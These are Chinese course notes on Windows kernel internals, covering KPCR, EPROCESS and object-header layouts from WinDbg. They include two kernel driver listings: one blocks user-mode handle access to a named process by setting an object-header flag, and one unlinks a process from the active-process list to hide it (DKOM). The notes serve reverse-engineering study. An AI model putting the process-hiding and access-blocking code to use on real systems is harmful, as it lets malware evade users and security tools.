四、进程线程
4.1.WRK安装
1.Project-->New Project-->选择wrk目录-->ok
2.Add and Remove Project Files--->选中四个文件-->Add Tree
3.搜索
4.2.KPCR
kpcr:cpu核控制块,cpu一个核一个kpcr结构
fs=0x30 在内核中的时候(x86),指向的是当前 CPU 核的 KPCR 结构
fs=0x3b 在应用层的时候(x86),指向的是当前线程的 TEB
1.kpcr结构
kd> dt _KPCR
ntdll!_KPCR
+0x000 NtTib : _NT_TIB
+0x000 Used_ExceptionList : Ptr32 _EXCEPTION_REGISTRATION_RECORD
+0x004 Used_StackBase : Ptr32 Void
+0x008 Spare2 : Ptr32 Void
+0x00c TssCopy : Ptr32 Void
+0x010 ContextSwitches : Uint4B
+0x014 SetMemberCopy : Uint4B
+0x018 Used_Self : Ptr32 Void //指向自己或者线程的TEB
+0x01c SelfPcr : Ptr32 _KPCR //一定会指向kpcr自己
+0x020 Prcb : Ptr32 _KPRCB //指向本 KPCR 内 +0x120 处的 PrcbData(KPRCB 扩展块)
+0x024 Irql : UChar
+0x028 IRR : Uint4B
+0x02c IrrActive : Uint4B
+0x030 IDR : Uint4B
+0x034 KdVersionBlock : Ptr32 Void
+0x038 IDT : Ptr32 _KIDTENTRY
+0x03c GDT : Ptr32 _KGDTENTRY
+0x040 TSS : Ptr32 _KTSS
+0x044 MajorVersion : Uint2B
+0x046 MinorVersion : Uint2B
+0x048 SetMember : Uint4B
+0x04c StallScaleFactor : Uint4B
+0x050 SpareUnused : UChar
+0x051 Number : UChar //当前跑在哪个核上
+0x052 Spare0 : UChar
+0x053 SecondLevelCacheAssociativity : UChar
+0x054 VdmAlert : Uint4B
+0x058 KernelReserved : [14] Uint4B
+0x090 SecondLevelCacheSize : Uint4B
+0x094 HalReserved : [16] Uint4B
+0x0d4 InterruptMode : Uint4B
+0x0d8 Spare1 : UChar
+0x0dc KernelReserved2 : [17] Uint4B
+0x120 PrcbData : _KPRCB //KPCR扩展块
2.KiProcessorBlock
扩展块
3.+0x000 NtTib
ntdll!_NT_TIB
+0x000 ExceptionList : Ptr32 _EXCEPTION_REGISTRATION_RECORD
+0x004 StackBase : Ptr32 Void
+0x008 StackLimit : Ptr32 Void //当前这个核上跑的线程的堆栈的栈顶和栈底
+0x00c SubSystemTib : Ptr32 Void
+0x010 FiberData : Ptr32 Void
+0x010 Version : Uint4B
+0x014 ArbitraryUserPointer : Ptr32 Void
+0x018 Self : Ptr32 _NT_TIB
4.3.函数类型
Windows 内核是混合式内核(课程里常简称为微内核风格),分为内核层(Ke/Ki)和执行体层(Ex/Ps/Mm/Io 等)
函数类型
Ex:执行体函数,进程、线程、链表、对象属性、赋值、取值、加锁相关
Ke:内核函数,大部分是导出
Ki:微内核函数,不导出,内部自己使用。进程、线程、cpu、调度相关
Ps:执行体函数,进程、线程相关
Mm:内存相关函数,一般导出
Mi:内存相关函数,Mm函数底层就是调用Mi,不导出
Io:文件、设备相关,导出
CC:文件缓存
Rtl:导出函数,一般是运行库,字符串操作等
Zw:与 Nt 同名的系统调用入口。在内核态调用 Zw 函数时,线程的先前模式(PreviousMode)会被置为 KernelMode,参数指针/句柄的探测校验因此被跳过;所以绝不能把未经验证的用户态指针直接传给 Zw 函数
Nt:真正实现功能的函数;Zw 函数本身不实现功能,经 SSDT 转到对应的 Nt 函数
CM:注册表
hal:硬件函数
Ob:对象管理器,句柄,创建内核对象,查询内核对象等
Pnp:即插即用(电源管理相关函数的前缀是 Po)
Psp:执行体函数,进程、线程。Ps函数实现复杂功能的时候,都是调用Psp
4.4.KPROCESS
KPROCESS
kd> dt _KPROCESS
ntdll!_KPROCESS
+0x000 Header : _DISPATCHER_HEADER
+0x010 ProfileListHead : _LIST_ENTRY //性能分析
+0x018 DirectoryTableBase : Uint4B //CR3
+0x01c LdtDescriptor : _KGDTENTRY
+0x024 Int21Descriptor : _KIDTENTRY
+0x02c ThreadListHead : _LIST_ENTRY //本进程线程链表的表头(遍历链表可得到线程个数,字段本身不是计数)
+0x034 ProcessLock : Uint4B //自旋锁
+0x038 Affinity : _KAFFINITY_EX //亲核性
+0x044 ReadyListHead : _LIST_ENTRY //就绪链表
+0x04c SwapListEntry : _SINGLE_LIST_ENTRY //交换链表
+0x050 ActiveProcessors : _KAFFINITY_EX
+0x05c AutoAlignment : Pos 0, 1 Bit
+0x05c DisableBoost : Pos 1, 1 Bit
+0x05c DisableQuantum : Pos 2, 1 Bit //时间片
+0x05c ActiveGroupsMask : Pos 3, 1 Bit
+0x05c ReservedFlags : Pos 4, 28 Bits
+0x05c ProcessFlags : Int4B
+0x060 BasePriority : Char //初始优先级
+0x061 QuantumReset : Char //时间片重置值
+0x062 Visited : UChar
+0x063 Unused3 : UChar
+0x064 ThreadSeed : [1] Uint4B
+0x068 IdealNode : [1] Uint2B
+0x06a IdealGlobalNode : Uint2B
+0x06c Flags : _KEXECUTE_OPTIONS
+0x06d Unused1 : UChar
+0x06e IopmOffset : Uint2B
+0x070 Unused4 : Uint4B
+0x074 StackCount : _KSTACK_COUNT
+0x078 ProcessListEntry : _LIST_ENTRY
+0x080 CycleTime : Uint8B
+0x088 KernelTime : Uint4B
+0x08c UserTime : Uint4B //进程(其所有线程)累计的内核态/用户态运行时间
+0x090 VdmTrapcHandler : Ptr32 Void
4.5.EPROCESS
kd> dt _EPROCESS 88079d40
ntdll!_EPROCESS
+0x000 Pcb : _KPROCESS
+0x098 ProcessLock : _EX_PUSH_LOCK //推锁(push lock),不是自旋锁
+0x0a0 CreateTime : _LARGE_INTEGER 0x01d88c86`b179ff84 //进程创建的时间
+0x0a8 ExitTime : _LARGE_INTEGER 0x0 //进程退出的时间
+0x0b0 RundownProtect : _EX_RUNDOWN_REF
+0x0b4 UniqueProcessId : 0x00000cb8 Void //进程pid
+0x0b8 ActiveProcessLinks : _LIST_ENTRY [ 0x83f59c88 - 0x88067540 ] //活动进程链表
+0x0c0 ProcessQuotaUsage : [2] 0x3688
+0x0c8 ProcessQuotaPeak : [2] 0x373c
+0x0d0 CommitCharge : 0x602
+0x0d4 QuotaBlock : 0x87acf1c0 _EPROCESS_QUOTA_BLOCK
+0x0d8 CpuQuotaBlock : (null)
+0x0dc PeakVirtualSize : 0x8156000
+0x0e0 VirtualSize : 0x8115000
+0x0e4 SessionProcessLinks : _LIST_ENTRY [ 0x8f18f010 - 0x87d6adbc ] //当前会话(session)内的进程链表
+0x0ec DebugPort : (null) //如果有值,说明正在被调试
+0x0f0 ExceptionPortData : 0x879e0f00 Void
+0x0f0 ExceptionPortValue : 0x879e0f00
+0x0f0 ExceptionPortState : 0y000
+0x0f4 ObjectTable : 0xa4738a78 _HANDLE_TABLE //句柄表
+0x0f8 Token : _EX_FAST_REF
+0x0fc WorkingSetPage : 0xf226 //工作集列表所在页的页帧号(PFN),并不是已使用的页数
+0x100 AddressCreationLock : _EX_PUSH_LOCK
+0x104 RotateInProgress : (null)
+0x108 ForkInProgress : (null)
+0x10c HardwareTrigger : 0
+0x110 PhysicalVadRoot : (null)
+0x114 CloneRoot : (null)
+0x118 NumberOfPrivatePages : 0x44e
+0x11c NumberOfLockedPages : 0
+0x120 Win32Process : 0xffa40510 Void
+0x124 Job : (null)
+0x128 SectionObject : 0x99dff928 Void
+0x12c SectionBaseAddress : 0x00be0000 Void
+0x130 Cookie : 0x910986dc
+0x134 Spare8 : 0
+0x138 WorkingSetWatch : (null)
+0x13c Win32WindowStation : 0x00000038 Void
+0x140 InheritedFromUniqueProcessId : 0x00000554 Void
+0x144 LdtInformation : (null)
+0x148 VdmObjects : (null)
+0x14c ConsoleHostProcess : 0
+0x150 DeviceMap : 0x83650490 Void
+0x154 EtwDataSource : (null)
+0x158 FreeTebHint : 0x7ffde000 Void
+0x160 PageDirectoryPte : _HARDWARE_PTE_X86
+0x160 Filler : 0
+0x168 Session : 0x8f18f000 Void
+0x16c ImageFileName : [15] "notepad.exe" //进程名:只保留映像文件名的前 15 个字节,过长会被截断;改名即可伪造,不应作为可靠的进程身份判断
+0x17b PriorityClass : 0x2 ''
+0x17c JobLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
+0x184 LockedPagesList : (null)
+0x188 ThreadListHead : _LIST_ENTRY [ 0x85da7298 - 0x88094fb0 ] //线程链表
+0x190 SecurityPort : (null)
+0x194 PaeTop : 0x86b79560 Void
+0x198 ActiveThreads : 4 //当前进程有多少个线程
+0x19c ImagePathHash : 0xeb1b961a
+0x1a0 DefaultHardErrorProcessing : 1
+0x1a4 LastThreadExitStatus : 0n0
+0x1a8 Peb : 0x7ffdf000 _PEB //PEB
+0x1ac PrefetchTrace : _EX_FAST_REF
+0x1b0 ReadOperationCount : _LARGE_INTEGER 0x1c
+0x1b8 WriteOperationCount : _LARGE_INTEGER 0x4
+0x1c0 OtherOperationCount : _LARGE_INTEGER 0x1fa
+0x1c8 ReadTransferCount : _LARGE_INTEGER 0x4b9031
+0x1d0 WriteTransferCount : _LARGE_INTEGER 0x2a38
+0x1d8 OtherTransferCount : _LARGE_INTEGER 0x126c
+0x1e0 CommitChargeLimit : 0
+0x1e4 CommitChargePeak : 0xb49
+0x1e8 AweInfo : (null)
+0x1ec SeAuditProcessCreationInfo : _SE_AUDIT_PROCESS_CREATION_INFO //进程映像的完整路径
+0x1f0 Vm : _MMSUPPORT
+0x25c MmProcessLinks : _LIST_ENTRY [ 0x83f600f0 - 0x880676e4 ]
+0x264 HighestUserAddress : 0x7fff0000 Void
+0x268 ModifiedPageCount : 0x209
+0x26c Flags2 : 0x200d000
+0x26c JobNotReallyActive : 0y0
+0x26c AccountingFolded : 0y0
+0x26c NewProcessReported : 0y0
+0x26c ExitProcessReported : 0y0
+0x26c ReportCommitChanges : 0y0
+0x26c LastReportMemory : 0y0
+0x26c ReportPhysicalPageChanges : 0y0
+0x26c HandleTableRundown : 0y0
+0x26c NeedsHandleRundown : 0y0
+0x26c RefTraceEnabled : 0y0
+0x26c NumaAware : 0y0
+0x26c ProtectedProcess : 0y0 //保护进程
+0x26c DefaultPagePriority : 0y101
+0x26c PrimaryTokenFrozen : 0y1
+0x26c ProcessVerifierTarget : 0y0
+0x26c StackRandomizationDisabled : 0y0
+0x26c AffinityPermanent : 0y0
+0x26c AffinityUpdateEnable : 0y0
+0x26c PropagateNode : 0y0
+0x26c ExplicitAffinity : 0y0
+0x270 Flags : 0x144d0801
+0x270 CreateReported : 0y1
+0x270 NoDebugInherit : 0y0
+0x270 ProcessExiting : 0y0
+0x270 ProcessDelete : 0y0
+0x270 Wow64SplitPages : 0y0
+0x270 VmDeleted : 0y0
+0x270 OutswapEnabled : 0y0
+0x270 Outswapped : 0y0
+0x270 ForkFailed : 0y0
+0x270 Wow64VaSpace4Gb : 0y0
+0x270 AddressSpaceInitialized : 0y10
+0x270 SetTimerResolution : 0y0
+0x270 BreakOnTermination : 0y0
+0x270 DeprioritizeViews : 0y0
+0x270 WriteWatch : 0y0
+0x270 ProcessInSession : 0y1
+0x270 OverrideAddressSpace : 0y0
+0x270 HasAddressSpace : 0y1
+0x270 LaunchPrefetched : 0y1
+0x270 InjectInpageErrors : 0y0
+0x270 VmTopDown : 0y0 //申请的内存地址从大地址开始,默认是小地址
+0x270 ImageNotifyDone : 0y1
+0x270 PdeUpdateNeeded : 0y0
+0x270 VdmAllowed : 0y0
+0x270 CrossSessionCreate : 0y0
+0x270 ProcessInserted : 0y1
+0x270 DefaultIoPriority : 0y010
+0x270 ProcessSelfDelete : 0y0
+0x270 SetTimerResolutionLink : 0y0
+0x274 ExitStatus : 0n259 //进程退出状态:259(STATUS_PENDING/STILL_ACTIVE)表示仍在运行,不是 259 说明已退出
+0x278 VadRoot : _MM_AVL_TABLE
+0x298 AlpcContext : _ALPC_PROCESS_CONTEXT
+0x2a8 TimerResolutionLink : _LIST_ENTRY [ 0x0 - 0x0 ]
+0x2b0 RequestedTimerResolution : 0
+0x2b4 ActiveThreadsHighWatermark : 6
+0x2b8 SmallestTimerResolution : 0
+0x2bc TimerResolutionStackRecord : (null)
4.6.OBJECT-HEADER
EPROCESS 前面紧挨着一个对象头 _OBJECT_HEADER,位于 EPROCESS 地址减 0x18 处(x86;x64 为减 0x30)
kd> dt _OBJECT_HEADER 88079d40-0x18
nt!_OBJECT_HEADER
+0x000 PointerCount : 0n54 //引用次数
+0x004 HandleCount : 0n3
+0x004 NextToFree : 0x00000003 Void
+0x008 Lock : _EX_PUSH_LOCK
+0x00c TypeIndex : 0x7 '' //对象类型
+0x00d TraceFlags : 0 ''
+0x00e InfoMask : 0x8 ''
+0x00f Flags : 0 '' //把 Flags 置上 4(Win7 上对应 KernelOnlyAccess 位,需按目标系统核对),对象管理器会拒绝用户态打开该对象的句柄,进程看起来就"被保护"了;这只是阻断句柄打开,并非真正的保护,偏移和位含义随版本变化
+0x010 ObjectCreateInfo : 0x87acf1c0 _OBJECT_CREATE_INFORMATION
+0x010 QuotaBlockCharged : 0x87acf1c0 Void
+0x014 SecurityDescriptor : 0x8ce7aeca Void
+0x018 Body : _QUAD
kd> eb 88079d40-0x18+f 4
kd> g
4.7.保护进程
DriverEntry.c
#include <ntifs.h>
/*
 * PsGetProcessImageFileName is exported by ntoskrnl but not declared in the
 * public WDK headers, hence the manual prototype. It returns a pointer to
 * EPROCESS.ImageFileName, a fixed 15-byte field (see the dt output above), so
 * long image names are truncated before any comparison.
 * NOTE(review): whether the field is always NUL-terminated is not shown here —
 * confirm before passing it to C string functions.
 */
EXTERN_C UCHAR * PsGetProcessImageFileName(
__in PEPROCESS Process
);
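/*
 * Set bit 0x04 in OBJECT_HEADER.Flags of the given process object.
 *
 * The object header immediately precedes the object body: 0x18 bytes on x86
 * and 0x30 bytes on x64, with Flags at header offset 0x0f / 0x1b. These are
 * the layouts from the Windows 7 dt output above; they are not stable across
 * OS builds and must be re-checked per target.
 * NOTE(review): on Windows 7 bit 0x04 appears to be KernelOnlyAccess, which
 * makes the object manager refuse user-mode handle opens (same effect as the
 * "eb ... 4" WinDbg command above) — confirm against the target's flag
 * definitions. This is a plain read-modify-write on a byte shared with the
 * object manager, performed without the object lock; a concurrent flag update
 * by the kernel could be lost.
 *
 * Process: referenced EPROCESS (caller holds the reference). NULL is ignored.
 */
#ifndef OBJECT_HEADER_BODY_OFFSET
#ifdef _WIN64
#define OBJECT_HEADER_BODY_OFFSET 0x30
#define OBJECT_HEADER_FLAGS_OFFSET 0x1b
#else
#define OBJECT_HEADER_BODY_OFFSET 0x18
#define OBJECT_HEADER_FLAGS_OFFSET 0x0f
#endif
#define OBJECT_HEADER_FLAG_PROTECT 0x04
#endif
VOID SetProcessFlags(PEPROCESS Process)
{
PUCHAR ObjectHeader = NULL;
if (Process == NULL)
{
return;
}
ObjectHeader = (PUCHAR)Process - OBJECT_HEADER_BODY_OFFSET;
*(ObjectHeader + OBJECT_HEADER_FLAGS_OFFSET) |= OBJECT_HEADER_FLAG_PROTECT;
}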
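/*
 * Clear bit 0x04 in OBJECT_HEADER.Flags of the given process object; the
 * inverse of SetProcessFlags.
 *
 * Uses the same Windows 7 header layout (body offset 0x18 on x86 / 0x30 on
 * x64, Flags at 0x0f / 0x1b) as the dt output above; version-specific.
 * NOTE(review): unsynchronised read-modify-write on a byte the object manager
 * also writes — see SetProcessFlags.
 *
 * Process: referenced EPROCESS (caller holds the reference). NULL is ignored.
 */
#ifndef OBJECT_HEADER_BODY_OFFSET
#ifdef _WIN64
#define OBJECT_HEADER_BODY_OFFSET 0x30
#define OBJECT_HEADER_FLAGS_OFFSET 0x1b
#else
#define OBJECT_HEADER_BODY_OFFSET 0x18
#define OBJECT_HEADER_FLAGS_OFFSET 0x0f
#endif
#define OBJECT_HEADER_FLAG_PROTECT 0x04
#endif
VOID CloseProcessFlags(PEPROCESS Process)
{
PUCHAR ObjectHeader = NULL;
if (Process == NULL)
{
return;
}
ObjectHeader = (PUCHAR)Process - OBJECT_HEADER_BODY_OFFSET;
*(ObjectHeader + OBJECT_HEADER_FLAGS_OFFSET) &= (UCHAR)~OBJECT_HEADER_FLAG_PROTECT;
}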
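/*
 * Find a process whose EPROCESS.ImageFileName equals `name` (case-insensitive)
 * by brute-forcing PIDs through PsLookupProcessByProcessId.
 *
 * Returns the EPROCESS with one reference taken on the caller's behalf, or
 * NULL when nothing matched (or name is NULL). The caller must release it
 * with ObDereferenceObject.
 *
 * Caveats:
 *  - ImageFileName is a 15-byte field, so long image names are truncated
 *    before comparison, the name is trivially spoofable by renaming the
 *    executable, and only the first match is returned.
 *  - PsLookupProcessByProcessId succeeds for any live PID, which presumably
 *    includes processes that are already exiting; not filtered here.
 *  - PIDs are multiples of 4, hence the stride; 0x1000000 is just a search
 *    ceiling, not an OS limit.
 */
PEPROCESS FindProceeByName(const char* name)
{
PEPROCESS findProcess = NULL;
if (name == NULL)
{
return NULL;
}
for (ULONG_PTR pid = 4; pid < 0x1000000; pid += 4)
{
PEPROCESS Process = NULL;
/* Look the process object up by PID; success takes a reference. */
NTSTATUS status = PsLookupProcessByProcessId((HANDLE)pid, &Process);
if (!NT_SUCCESS(status))
{
continue;
}
/* Short (15-byte) image name stored in EPROCESS. */
const char* processName = (const char*)PsGetProcessImageFileName(Process);
if (processName != NULL && _stricmp(processName, name) == 0)
{
findProcess = Process; /* reference deliberately kept for the caller */
break;
}
ObDereferenceObject(Process); /* reference count -1 */
}
return findProcess;
}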
/*
 * Unload callback: re-resolve the target by image name, clear the header flag
 * bit set in DriverEntry, and drop the lookup's reference.
 * NOTE(review): the target is looked up again by name rather than from a
 * reference saved at load time, so if the original process has exited and a
 * different "Dbgview.exe" has started since, that process's header is the one
 * modified; if none is running, nothing is done.
 */
VOID DriverUnload(PDRIVER_OBJECT pDriver)
{
PEPROCESS target = FindProceeByName("Dbgview.exe");
(void)pDriver;
if (target != NULL)
{
CloseProcessFlags(target);
ObDereferenceObject(target); /* release the reference taken by FindProceeByName */
}
}
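/*
 * Driver entry: locate "Dbgview.exe" and set the object-header flag bit on it.
 *
 * Returns STATUS_UNSUCCESSFUL (driver not loaded) when no such process exists,
 * STATUS_SUCCESS otherwise. Fix relative to the original listing: the EPROCESS
 * reference returned by FindProceeByName was never released here, leaking one
 * reference for the lifetime of the system; the flag lives in the object
 * header, so no reference needs to be held once it is set.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriver, PUNICODE_STRING pReg)
{
PEPROCESS Process = FindProceeByName("Dbgview.exe");
(void)pReg;
if (Process == NULL)
{
return STATUS_UNSUCCESSFUL;
}
SetProcessFlags(Process);
ObDereferenceObject(Process); /* release the reference taken by FindProceeByName */
pDriver->DriverUnload = DriverUnload;
return STATUS_SUCCESS;
}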
4.8.进程断链
DriverEntry.c
#include <ntifs.h>
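/*
 * Bounded, case-sensitive substring search over a wide buffer that is NOT
 * required to be NUL-terminated. `needle` is a NUL-terminated wide string.
 * Returns TRUE when needle occurs within hay[0..hayChars). An empty needle
 * matches, mirroring wcsstr.
 */
static BOOLEAN ContainsWide(const WCHAR *hay, SIZE_T hayChars, const WCHAR *needle)
{
SIZE_T needleChars = 0;
while (needle[needleChars] != L'\0')
{
needleChars++;
}
if (needleChars == 0)
{
return TRUE;
}
for (SIZE_T start = 0; start + needleChars <= hayChars; start++)
{
SIZE_T k = 0;
while (k < needleChars && hay[start + k] == needle[k])
{
k++;
}
if (k == needleChars)
{
return TRUE;
}
}
return FALSE;
}

/*
 * Find a process whose full image path (SeLocateProcessImageName) contains
 * `name`, comparing after upper-casing the path. `name` must already be
 * upper-case (the caller passes L"DBGVIEW.EXE").
 *
 * Returns the EPROCESS with one reference kept for the caller, or NULL when
 * nothing matched (or name is NULL); release with ObDereferenceObject.
 *
 * Fix relative to the original listing: the UNICODE_STRING buffer returned by
 * SeLocateProcessImageName is not guaranteed to be NUL-terminated, so
 * _wcsupr()/wcsstr() could read or write past its end. The upcase is now done
 * in place, bounded by Length, and the search is bounded as well.
 *
 * Caveats: this is a substring match on the NT path, so "DBGVIEW.EXE" also
 * matches e.g. "...\DBGVIEW.EXE.BAK" or any directory containing that text;
 * the first match wins; PID 4 (System) is skipped by starting at 8.
 */
PEPROCESS FindProcessByName(PWCH name)
{
PEPROCESS findProcess = NULL;
if (name == NULL)
{
return NULL;
}
for (ULONG_PTR pid = 8; pid < 0x1000000; pid += 4)
{
PEPROCESS Process = NULL;
PUNICODE_STRING ProcessName = NULL;
NTSTATUS status = PsLookupProcessByProcessId((HANDLE)pid, &Process);
if (!NT_SUCCESS(status))
{
continue;
}
/* Full image path; the returned allocation must be freed with ExFreePool. */
status = SeLocateProcessImageName(Process, &ProcessName);
if (!NT_SUCCESS(status))
{
ObDereferenceObject(Process);
continue;
}
if (ProcessName->Length != 0 && ProcessName->Buffer != NULL)
{
/* In-place upcase bounded by Length (no NUL terminator assumed). */
status = RtlUpcaseUnicodeString(ProcessName, ProcessName, FALSE);
if (NT_SUCCESS(status) &&
ContainsWide(ProcessName->Buffer, ProcessName->Length / sizeof(WCHAR), name))
{
findProcess = Process;
}
}
ExFreePoolWithTag(ProcessName, 0); /* free the path in every case */
if (findProcess != NULL)
{
break; /* keep the reference on the match for the caller */
}
ObDereferenceObject(Process);
}
return findProcess;
}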
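/*
 * Recover the EPROCESS.ActiveProcessLinks offset at runtime by scanning the
 * start of nt!PsGetProcessId for the x86 instruction `mov eax,[eax+disp32]`
 * (8B 80 xx xx xx xx): disp32 is the UniqueProcessId offset, and on x86
 * ActiveProcessLinks is the next field after the 4-byte HANDLE, hence +4
 * (0xb4 -> 0xb8 in the dt output above).
 *
 * Returns 0 when the routine cannot be resolved or the pattern is not found.
 * Callers MUST check for 0: offset 0 points at the KPROCESS header and
 * writing a list entry there corrupts the process object.
 *
 * x86-only: the x64 encoding differs (`mov rax,[rcx+disp32]`, 48 8B 81 ...)
 * and UniqueProcessId is 8 bytes there, so the +4 would also be wrong.
 * Result is cached in a static; the cache is unsynchronised, which is
 * acceptable because every scan produces the same value.
 */
ULONG GetProcessActiveProcessLinkOffset(VOID)
{
static ULONG offset = 0;
UNICODE_STRING routineName;
PUCHAR func = NULL;
if (offset != 0)
{
return offset;
}
RtlInitUnicodeString(&routineName, L"PsGetProcessId");
func = (PUCHAR)MmGetSystemRoutineAddress(&routineName);
if (func == NULL)
{
return 0; /* symbol not resolved; do not dereference NULL */
}
/* 100-byte scan window; stop early so opcode + 4-byte displacement stay inside it. */
for (ULONG i = 0; i + 6 <= 100; i++)
{
if (func[i] == 0x8b && func[i + 1] == 0x80)
{
ULONG disp = 0;
RtlCopyMemory(&disp, func + i + 2, sizeof(disp)); /* alignment-safe read of disp32 */
offset = disp + 4;
break;
}
}
return offset;
}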
/*
 * Unload callback. Intentionally empty: the driver keeps no record of which
 * process it unlinked in DriverEntry, so it cannot relink it, and it holds no
 * resources to release.
 * NOTE(review): the unlinked process stays hidden from PsActiveProcessHead
 * walkers after this driver is gone.
 */
VOID DriverUnload(PDRIVER_OBJECT pDriver)
{
(void)pDriver;
}
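/*
 * Driver entry: unlink "DBGVIEW.EXE" from the active-process list (DKOM) so
 * enumerations that walk PsActiveProcessHead no longer see it.
 *
 * Fixes relative to the original listing: a NULL result from FindProcessByName
 * and a 0 result from GetProcessActiveProcessLinkOffset were both used
 * unchecked (NULL dereference, or a list write into the KPROCESS header), and
 * the list-entry pointer was passed without a cast.
 *
 * Caveats: the list is modified without the lock the kernel uses for it, so a
 * concurrent process create/exit can race this; the process remains reachable
 * through PID/handle-table lookups, so this only defeats list-walking
 * enumeration; on x64, public documentation describes this kind of list
 * modification as within what Kernel Patch Protection checks (not verified
 * here). The entry is re-initialised to point at itself so that a later
 * RemoveEntryList by the kernel (e.g. at exit) presumably stays safe — TODO
 * confirm against the target build.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriver, PUNICODE_STRING pReg)
{
PEPROCESS Process = NULL;
ULONG offset = 0;
PLIST_ENTRY links = NULL;
(void)pReg;

pDriver->DriverUnload = DriverUnload;

Process = FindProcessByName(L"DBGVIEW.EXE");
if (Process == NULL)
{
return STATUS_UNSUCCESSFUL; /* no target: nothing to unlink */
}
offset = GetProcessActiveProcessLinkOffset();
if (offset == 0)
{
ObDereferenceObject(Process);
return STATUS_UNSUCCESSFUL; /* pattern not found; refuse to write at offset 0 */
}
links = (PLIST_ENTRY)((PUCHAR)Process + offset);
RemoveEntryList(links); /* unlink from the active-process list */
InitializeListHead(links); /* self-link the orphaned entry */
ObDereferenceObject(Process); /* release the reference taken by FindProcessByName */
return STATUS_SUCCESS;
}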
4.9.线程查找
KTHREAD
+0x074 WaitListEntry : _LIST_ENTRY //就绪线程
dt nt!_KPRCB
//链表包含32个成员,对应就绪位图的32位。就绪位图的位为1,说明这个链表对应的索引成员有就绪线程
+0x3220 DispatcherReadyListHead : [32] _LIST_ENTRY
//就绪位图,二进制32位,
+0x31ec ReadySummary : Uint4B
KiFindReadyThread 函数逆向分析:首先按 x,进到 KiSearchForNewThread,找到 KiFindReadyThread 的三个参数
然后开始分析KiFindReadyThread
4.10.线程主动切换
KiSwapThread